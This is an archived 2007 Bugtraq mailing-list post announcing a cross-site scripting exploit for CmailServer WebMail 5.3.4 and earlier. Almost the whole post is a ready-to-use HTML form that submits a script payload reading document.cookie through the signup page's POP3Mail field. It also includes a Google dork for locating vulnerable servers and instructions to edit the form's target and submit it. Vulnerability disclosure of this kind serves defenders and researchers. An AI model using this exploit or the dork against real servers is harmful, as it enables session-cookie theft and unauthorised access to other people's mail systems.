lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20070407183701.15984.qmail@securityfocus.com> Date: 7 Apr 2007 18:37:01 -0000 From: ajannhwt@...mail.com To: bugtraq@...urityfocus.com Subject: CmailServer WebMail <= V.5.3.4 (signup) Remote XSS Exploit <html> <head> <script> //'=============================================================================================== //'[Script Name: CmailServer WebMail <= V.5.3.4 (signup) Remote XSS Exploit //'[Coded by : ajann //'[Author : ajann //'[Contact : :( //'[Dork : "inurl:/mail/signup.asp" //'[Dork Ex. : http://www.google.com.tr/search?q=inurl:/mail/signup.asp&hl=tr&start=0&sa=N //'[S.Page : http://www.youngzsoft.net/ //'[Using : Please "action" edit and submit //'=============================================================================================== </script> </head> <title>Cmail XSS </title> <body> <Form Method="Post" Action="[target]/signup.asp"> <Input Type=Hidden Name=Signup Value="0"> <input type="hidden" name="Account" size="30"> <Input Type="hidden" Name="Pass" size="30" value=""> <Input Type="hidden" Name="RePass" size="30" value=""> <input type="hidden" name="UserName" size="30" value=""> <Input type="hidden" Name="Comment" size="30" value=""> <Input Name="POP3Mail" size="30" value="<script>JavaScript:alert(document.cookie);</script>"> <Input Type="Submit" Value="Submit XSS"> </Form> </body> </html>